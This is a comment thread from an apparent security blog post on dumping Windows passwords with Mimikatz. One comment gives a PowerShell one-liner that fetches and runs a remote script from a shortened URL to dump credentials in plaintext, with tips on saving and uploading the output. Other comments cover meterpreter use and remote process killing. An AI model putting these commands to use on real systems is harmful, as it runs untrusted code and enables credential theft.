tag:blogger.com,1999:blog-3421984462344108380.post8224810614959695600..comments2023-05-26T06:34:54.028-04:00Comments on Open Security Research: Using Mimikatz to Dump Passwords!Unknownnoreply@blogger.comBlogger11125tag:blogger.com,1999:blog-3421984462344108380.post-40993472026325223592014-12-21T13:21:08.960-05:002014-12-21T13:21:08.960-05:00thanks, seems nice, no need to download mimikatz t...thanks, seems nice, no need to download mimikatz then, got it. but unfortunatly, i can not make the privilege::debug to the invoke option. any idea how to ?<br />Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-3421984462344108380.post-67791297823169004772014-12-09T14:36:19.466-05:002014-12-09T14:36:19.466-05:00Also any service accounts that have been configure...Also any service accounts that have been configured, so for instance on a server you might hit a nice domain admin account which is being used for backups... :DAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-3421984462344108380.post-39223322580326703132014-01-17T22:07:47.048-05:002014-01-17T22:07:47.048-05:00Just type this into PowerShell as an administrator...Just type this into PowerShell as an administrator: <br /><br />powershell &quot;IEX (New-Object Net.WebClient).DownloadString(&#39;http://is.gd/oeoFuI&#39;); Invoke-Mimikatz -DumpCreds&quot;<br /><br />This will give you the user password in plaintext in one command. Also, add this onto the end of the powershell script above:<br /><br /> &gt;&gt; C:\Output.txt<br /><br />This will save the output to a file, making it even easier to collect your data. You can always change the path to make it easier to collect results, even upload to fpt etc!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-3421984462344108380.post-71753658709545076912013-09-18T05:22:42.807-04:002013-09-18T05:22:42.807-04:00I am trying this for the first time. At the final ...I am trying this for the first time. At the final stage I am getting <br /><br />&quot;Méthode &#39;getLogonPasswords&#39; introuvable !<br /><br />which translates as method &#39;getLogonPasswords&#39; found<br /><br />but no passwords are displayed.<br /><br />Your help/thoughts would be appreciated.<br /><br />GerAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-3421984462344108380.post-67427983518260901552012-08-19T14:58:02.937-04:002012-08-19T14:58:02.937-04:00This is &quot;just&quot; for logged in users ;) (o...This is &quot;just&quot; for logged in users ;) (or just logged in before)Gentil Kiwihttps://www.blogger.com/profile/00347165989685095376noreply@blogger.comtag:blogger.com,1999:blog-3421984462344108380.post-50853114637221358362012-07-20T14:47:45.709-04:002012-07-20T14:47:45.709-04:00I am a beginner but i need to ask one thing. It re...I am a beginner but i need to ask one thing.<br />It returns passwords of the logged in user, right?<br />I opened a session using meterpreter, got the shell and ran it, and got passwords of logged in user.<br />But what if i need passwords of other accounts as well? How do i do that, given user is logged in using his account only!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-3421984462344108380.post-60906744478631540582012-07-06T17:21:48.623-04:002012-07-06T17:21:48.623-04:00Thanks! Actually that was there in the original ve...Thanks! Actually that was there in the original version of this blog post but I somehow cut it out in transforming it from .txt to HTML. Fixed it above.. btw - great tool man!Anonymoushttps://www.blogger.com/profile/11221368398774466195noreply@blogger.comtag:blogger.com,1999:blog-3421984462344108380.post-37343839789270024672012-07-06T16:35:33.895-04:002012-07-06T16:35:33.895-04:00it&#39;s just maybe because you don&#39;t unload s...it&#39;s just maybe because you don&#39;t unload sekurlsa.dll ( use &quot;@&quot;), or a proper &quot;exit&quot; in mimikatz (automatic unload...).Gentil Kiwihttps://www.blogger.com/profile/00347165989685095376noreply@blogger.comtag:blogger.com,1999:blog-3421984462344108380.post-33573876735202213722012-07-03T17:05:52.295-04:002012-07-03T17:05:52.295-04:00Thanks for posting your problem and your solution....Thanks for posting your problem and your solution. :) For others out there that may experience the same issue, the following commands should help you kill the hanging process remotely:<br /><br />Kill by PID:<br />tasklist /S {IP.Ad.dr.ess} [/U domain\username]<br />taskkill /F /PID {PID} /S {IP.Ad.dr.ess} [/U domain\username]<br /><br />Kill by image name:<br />taskkill /F /IM mimikatz.exe /S {IP.Ad.dr.ess} [/U domain\username]Tony Leehttps://www.blogger.com/profile/04935721260910647091noreply@blogger.comtag:blogger.com,1999:blog-3421984462344108380.post-23225680555087084362012-06-28T09:57:20.745-04:002012-06-28T09:57:20.745-04:00I had to remotely kill the process. All is well.I had to remotely kill the process. All is well.Anonnoreply@blogger.comtag:blogger.com,1999:blog-3421984462344108380.post-83388770430184456542012-06-28T09:39:58.956-04:002012-06-28T09:39:58.956-04:00Tony, Thank you for the post. I was wondering i...Tony,<br /> <br />Thank you for the post. I was wondering if you have had any issues deleting the sekurlsa.dll file after injecting? I am testing this exact scenario and have successfully dumped the information but am unable to delete the injected .dll --- obviously because it is in use.<br /><br />I am trying to figure out a work around...Anonnoreply@blogger.com